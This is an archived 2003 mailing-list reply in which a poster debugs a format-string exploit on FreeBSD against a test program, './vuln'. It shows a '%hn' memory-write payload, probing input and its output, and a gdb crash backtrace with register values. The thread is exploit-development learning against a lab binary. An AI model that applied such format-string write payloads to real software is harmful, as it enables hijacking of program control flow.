Vulnerability Development mailing list archives
Re: Formatstrings on *BSD
From: Ingram <Vail () gmx net>
Date: Fri, 20 Jun 2003 10:07:26 +0200 (MEST)
[%.-16457x%8$hn%.15261x%9$hn] (35)^---- first question is your input still at %8$x and %9$x on the bsd box?
yep, see here:
uname
FreeBSD
./vuln AAAABBBB%x%x%x%x%x%x%x%x%x
0 0xbfbffccc 1 0xbfbffcd3 helloWorld() = 0x8048770 accessForbidden() = 0x80487a0 before : ptrf() = 0x8048770 (0xbfbffad8) buffer = [AAAABBBB2805f00022806dfe4105b6cc2805f100bfbffb1480487704141414142424242] (71) after : ptrf() = 0x8048770 (0xbfbffad8) Welcome in "helloWorld"
... Segmentation fault (core dumped)^---- second ... what does the bt look like in gdb...
here we go, the fmt seems to corrupt eax
gdb -core vuln.core
GNU gdb 4.18 . . . This GDB was configured as "i386-unknown-freebsd". Core was generated by `vuln'. Program terminated with signal 11, Segmentation fault. #0 0x40517d31 in ?? () (gdb) bt #0 0x40517d31 in ?? () #1 0x8048805 in ?? () #2 0x8048767 in ?? () #3 0x8048561 in ?? () (gdb) i reg eax 0x40517d31 1079082289 ecx 0x8049a70 134519408 edx 0x280e9968 672045416 ebx 0x280e8424 672039972 esp 0xbfbffad4 0xbfbffad4 ebp 0xbfbffae0 0xbfbffae0 esi 0x1 1 edi 0x280e9960 672045408 eip 0x40517d31 0x40517d31 eflags 0x10216 66070 cs 0x1f 31 ss 0x2f 47 ds 0x2f 47 es 0x2f 47 fs 0x2f 47 gs 0x2f 47 (gdb) x/1x $eax 0x40517d31: Cannot access memory at address 0x40517d31. kind regards Ingram -- +++ GMX - Mail, Messaging & more http://www.gmx.net +++ Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!
Current thread:
- Formatstrings on *BSD Vail (Jun 18)
- Re: Formatstrings on *BSD KF (Jun 18)
- <Possible follow-ups>
- Re: Formatstrings on *BSD Ingram (Jun 21)
- Re: Formatstrings on *BSD The Itch (Jun 21)